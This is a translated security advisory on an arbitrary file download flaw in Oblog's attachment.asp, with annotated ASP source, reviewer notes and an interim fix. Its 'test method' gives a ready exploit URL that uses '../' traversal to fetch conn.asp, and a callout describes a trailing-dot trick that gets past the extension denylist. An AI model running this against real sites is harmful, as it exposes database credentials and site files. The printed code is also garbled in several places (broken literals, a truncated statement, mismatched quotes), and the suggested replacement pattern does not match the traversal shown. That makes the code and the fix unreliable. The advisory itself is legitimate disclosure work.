Oblog arbitrary file download vulnerability research

Source: Internet
Author: User

' Read the two request parameters that select the file to serve. Both are taken from the request and are untrusted input.
Path = Trim (Request ("path")) ' Get the path submitted by the user
Fileid = Trim (Request ("Fileid"))
' Reject the request only when neither parameter is supplied; these lines apply no other validation to Path.
If Fileid = "" and Path = "" Then
Response.Write "Insufficient Parameters"
Response.End
End If
...
' Main dispatch: serve the requested attachment, either by database id (Fileid) or by a caller-supplied path (Path).
' NOTE(review): "Or 1= 1" makes the condition below always true as printed, so the value of checkdownload has no effect and the Else branch further down (403 / placeholder image) is never reached.
If checkdownload Or 1= 1Then
If Path = "" Then
' Branch 1 - lookup by id. The file path comes from the oblog_upfile table, not from the request.
' NOTE(review): the ProgID literal on the next line is garbled in this copy; presumably "ADODB.RecordSet" - confirm against the original file.
Set rs = Server.CreateObject ("ADODB.") RecordSet ")
' Link_database is defined elsewhere; presumably it opens the connection conn used below - confirm.
Link_database
' clng converts Fileid to a Long before concatenation, so only a numeric value reaches the SQL text.
SQL = ("Select File_path,userid,file_ext,viewnum from oblog_upfile WHERE Fileid =" &clng (Fileid))
Rs.Open sql,conn,1,3
If not Rs. Eof Then
' UID and File_ext are assigned but not used in the lines shown here.
UID = RS (1)
File_ext = RS (2)
' Increment the stored view counter for this attachment.
RS ("viewnum") = RS ("Viewnum") + 1
Rs. Update
' stype 0: DownloadFile answers 404 if the stored path no longer exists on disk.
DownloadFile Server.MapPath (RS (0)), 0
Else
response.status=404
Response.Write "This attachment does not exist!"
End If
Rs. Close
Set rs = Nothing
Else
' Branch 2 - caller-supplied path. Path is request input and is passed to Server.MapPath unchanged.
' NOTE(review): INSTR only tests that the configured value appears somewhere in Path. That does not establish that the mapped file is inside the upload directory; a containment check would map the path first and then require the result to start with the mapped upload root. Whether Server.MapPath accepts ".." segments at all depends on the IIS parent-paths setting - confirm for the deployment.
If INSTR (path,oblog.cacheconfig) > 0 Then ' tr4c3 callout: note that the only check here is whether the user-submitted path contains the upload directory name (Uploadfiles); when it does, DownloadFile is called to send the file
DownloadFile Server.MapPath (Path), 1
End If
End If
Else
' If the attachment is a picture, serve a default picture when the permission check fails, so that pages embedding it still display correctly
If Path = "" Then
response.status=403
Response.Write Showdownerr
Response.End
Else
DownloadFile Server.MapPath (blogdir& "Images/oblog_powered.gif"), 1
End If
End If

' Release the Oblog object once the request has been handled.
Set Oblog = Nothing

' DownloadFile: read the file at Strfile from disk and write it to the HTTP response.
'   Strfile - file system path to serve; the callers in this listing pass the result of Server.MapPath.
'   stype   - 0: answer 404 when the file is missing; any other value: serve Images/nopic.gif instead.
' NOTE(review): nothing in this Sub confirms that Strfile lies inside an allowed directory; it relies on its callers for that.
Sub DownloadFile (Strfile,stype)
' From here on errors are not raised; execution continues with the next statement after a failure.
On Error Resume Next
server.scripttimeout=9999999
Dim S,fso,f,intfilelength,strfilename
strFileName = strfile
Response.Clear
' The component ProgIDs come from the Oblog object. The calls below (open, type = 1, loadfromfile, read) suggest a binary stream object - presumably ADODB.Stream, confirm against the configuration.
Set s = Server.CreateObject (Oblog. Cachecompont (2))
S.open
S.type = 1
' Presumably Scripting.FileSystemObject, given the FileExists / GetFile calls - confirm.
Set FSO = Server.CreateObject (oblog. Cachecompont (1))
If not FSO. FileExists (strFileName) Then
If stype = 0 Then
response.status=404
Response.Write "The attachment has been removed!"
Exit Sub
Else
' Missing file and stype <> 0: fall back to the placeholder image.
strFileName = Server.MapPath (blogdir& "Images/nopic.gif")
End If
End If
Set f = fso. GetFile (strFileName)
Intfilelength = F.size
S.loadfromfile (strFileName)
' NOTE(review): the error branch below is truncated in this copy (the Response.Write argument is cut off); consult the original file.
If ERR Then
Response.Write ("Response.End
End If
Set fso=nothing
Dim Data
' The whole file is read into memory here, before the extension check below decides whether it may be sent.
Data=s.read
S.close
Set s=nothing
Dim ContentType
' Extension check. It inspects the last four characters of the caller-supplied string strfile - not strFileName (which may have been replaced by nopic.gif above) and not the name of the file object f that was actually opened.
' NOTE(review): the literals are printed with a space after the dot, which looks like an artifact of this copy. Assuming the originals are ".asp", ".mdb", ".config", ".js": ".config" (7 characters) and ".js" (3 characters) can never equal a 4-character suffix, so only ".asp" and ".mdb" are effectively blocked, and every other suffix reaches a Case that sends the file. A denylist applied to a raw suffix is weaker than an allowlist of extensions checked against the normalized name of the file that was opened.
' NOTE(review): the capitalisation of several literals (". Doc", "JPEG", "MPEG") also looks altered by the copy; as printed they could not match the LCase'd value.
Select Case LCase (Right (strfile, 4))
Case ". asp", ". mdb", ". config", ". js" ' tr4c3 callout: look here as well. The arbitrary download vulnerability in the news system that I wrote up the other day ("boiling forecast" in this translation, apparently the product name) uses a similar check [http://www.tr4c3.com/post/306.html], and it is defeated the same way: the trailing "." comes in handy again.
' Blocked type: leave without sending anything.
Exit Sub
Case ". asf"
ContentType = "VIDEO/X-MS-ASF"
Case ". avi"
ContentType = "Video/avi"
Case ". Doc"
ContentType = "Application/msword"
Case ". zip"
ContentType = "Application/zip"
Case ". xls"
ContentType = "Application/vnd.ms-excel"
Case ". gif"
ContentType = "Image/gif"
Case ". jpg", "JPEG"
ContentType = "Image/jpeg"
Case ". wav"
ContentType = "Audio/wav"
Case ". mp3"
ContentType = "Audio/mpeg3"
Case ". mpg", "MPEG"
ContentType = "Video/mpeg"
Case ". rtf"
ContentType = "Application/rtf"
Case ". htm", "html"
ContentType = "Text/html"
Case ". txt"
ContentType = "Text/plain"
Case Else
' Any suffix not listed above is sent as a generic binary download.
ContentType = "Application/octet-stream"
End Select
If response.isclientconnected Then
' Files whose name contains an image extension are sent without a Content-disposition header; everything else is sent as an attachment named after f.Name.
' NOTE(review): the parentheses and quotes on the next two lines are garbled in this copy; consult the original file.
If Not (InStr LCase (F.name), ". gif") >0 or InStr (LCase (F.name), ". jpg") >0 or InStr (LCase (F.name), ". jpeg") >0 or InStr (LCase (F.name), ". bmp") >0 Or InStr (LCase (F.name), ". png") >0) Then
Response.AddHeader "Content-disposition", "attachment"; Filename= "& F.name
End If
' Content-length is the size of the file object opened above (F.size).
Response.AddHeader "Content-length", intfilelength
Response.Charset = "UTF-8"
Response.ContentType = ContentType
Response.BinaryWrite Data
Response.Flush
Response.Clear ()
End If
End Sub

<* Reference:
Tr4c3[at]126[dot]com
*>
Test method:

Warning

The following procedure (method) may be offensive in nature and is provided only for security research and teaching purposes. Use it at your own risk!

########################################################################
How to use:
Http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.
########################################################################
Suggestions:
Patching recommendations:
Wait for the official release of the new patch.
########################################################################
Interim solution:
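In attachment.asp, change line 5 from Path = Trim (Request ("path")) to Path = Replace (Trim (Request ("path")), "...", ""). The replaced string is printed as "..." in this copy, while the traversal sequence in the example above is "..", so check the pattern against the original advisory. This is a stop-gap only: deleting a substring does not confirm that the resolved file lies inside the upload directory, and it leaves the extension check in DownloadFile unchanged.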
########################################################################
